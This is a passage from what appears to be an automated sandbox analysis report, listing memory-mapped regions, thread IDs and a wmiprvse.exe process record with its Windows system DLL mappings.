(normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1393 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1394 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1395 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1396 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1397 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1398 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1399 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1400 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1401 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1402 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1403 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1404 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1405 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1406 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1407 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1408 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1409 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1410 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1411 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1412 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1413 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1414 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1415 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1416 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1417 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1418 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1419 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1420 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1421 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1422 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1423 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1424 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1425 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1426 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1427 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1428 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1429 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1430 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1431 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1432 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1433 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1434 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1435 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1436 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1437 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1438 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1439 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1440 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1441 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1442 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1521 start_va = 0x800000 end_va = 0x803fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1522 start_va = 0xad0000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 1581 start_va = 0x810000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Thread: id = 66 os_tid = 0xd70 Thread: id = 67 os_tid = 0xd6c Thread: id = 68 os_tid = 0xd68 Thread: id = 69 os_tid = 0xd64 Thread: id = 70 os_tid = 0xd60 Thread: id = 71 os_tid = 0xd5c Thread: id = 72 os_tid = 0xd58 Thread: id = 73 os_tid = 0xd54 Thread: id = 74 os_tid = 0xd50 Thread: id = 101 os_tid = 0xb08 Thread: id = 115 os_tid = 0xdc8 Process: id = "6" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x7ef47380" os_pid = "0x488" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x248" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ae26" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1443 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1444 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1445 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1446 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1447 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1448 start_va = 0xc0000 end_va = 0x119fff monitored = 0 entry_point = 0xfa810 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1449 start_va = 0x120000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1450 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1451 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1452 start_va = 0x1c0000 end_va = 0x1c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1453 start_va = 0x1d0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1454 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1455 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1456 start_va = 0x230000 end_va = 0x230fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1457 start_va = 0x240000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1458 start_va = 0x340000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1459 start_va = 0x410000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1460 start_va = 0x520000 end_va = 0x7eefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1461 start_va = 0x7f0000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 1462 start_va = 0x880000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 1463 start_va = 0x8d0000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 1464 start_va = 0x910000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 1465 start_va = 0x950000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 1466 start_va = 0xa80000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 1467 start_va = 0xac0000 end_va = 0xafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 1468 start_va = 0xb80000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 1469 start_va = 0xc30000 end_va = 0xc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 1470 start_va = 0xcd0000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 1471 start_va = 0xdc0000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 1472 start_va = 0x69fa0000 end_va = 0x69fdbfff monitored = 0 entry_point = 0x69fa1396 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 1473 start_va = 0x69fe0000 end_va = 0x69ff7fff monitored = 0 entry_point = 0x69fe12b0 region_type = mapped_file name = "wmiperfclass.dll" filename = "\\Windows\\System32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll") Region: id = 1474 start_va = 0x6fd70000 end_va = 0x6fdcbfff monitored = 0 entry_point = 0x6fd92b48 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1475 start_va = 0x6fdd0000 end_va = 0x6fdf7fff monitored = 0 entry_point = 0x6fdd1544 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 1476 start_va = 0x734a0000 end_va = 0x734aefff monitored = 0 entry_point = 0x734a7f10 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1477 start_va = 0x735b0000 end_va = 0x735c9fff monitored = 0 entry_point = 0x735c03d0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1478 start_va = 0x73620000 end_va = 0x7362efff monitored = 0 entry_point = 0x736293d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1479 start_va = 0x73810000 end_va = 0x7381afff monitored = 0 entry_point = 0x738152a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1480 start_va = 0x73820000 end_va = 0x73837fff monitored = 0 entry_point = 0x73821335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1481 start_va = 0x73840000 end_va = 0x738e5fff monitored = 0 entry_point = 0x738aa2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1482 start_va = 0x73ae0000 end_va = 0x73b40fff monitored = 0 entry_point = 0x73b1bf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1483 start_va = 0x74c10000 end_va = 0x74c30fff monitored = 0 entry_point = 0x74c1145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1484 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1485 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1486 start_va = 0x75400000 end_va = 0x75416fff monitored = 0 entry_point = 0x75403574 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1487 start_va = 0x75490000 end_va = 0x754d1fff monitored = 0 entry_point = 0x75491360 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1488 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1489 start_va = 0x75800000 end_va = 0x7580dfff monitored = 0 entry_point = 0x75801235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1490 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1491 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1492 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1493 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1494 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1495 start_va = 0x75f90000 end_va = 0x75f95fff monitored = 0 entry_point = 0x75f91782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1496 start_va = 0x76000000 end_va = 0x76034fff monitored = 0 entry_point = 0x7600145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1497 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1498 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1499 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1500 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1501 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1502 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1503 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1504 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1505 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1506 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1507 start_va = 0x77810000 end_va = 0x77892fff monitored = 0 entry_point = 0x778123d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1508 start_va = 0x778b0000 end_va = 0x778f4fff monitored = 0 entry_point = 0x778b11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1509 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1510 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1511 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1512 start_va = 0x7ffd7000 end_va = 0x7ffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1513 start_va = 0x7ffd8000 end_va = 0x7ffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1514 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 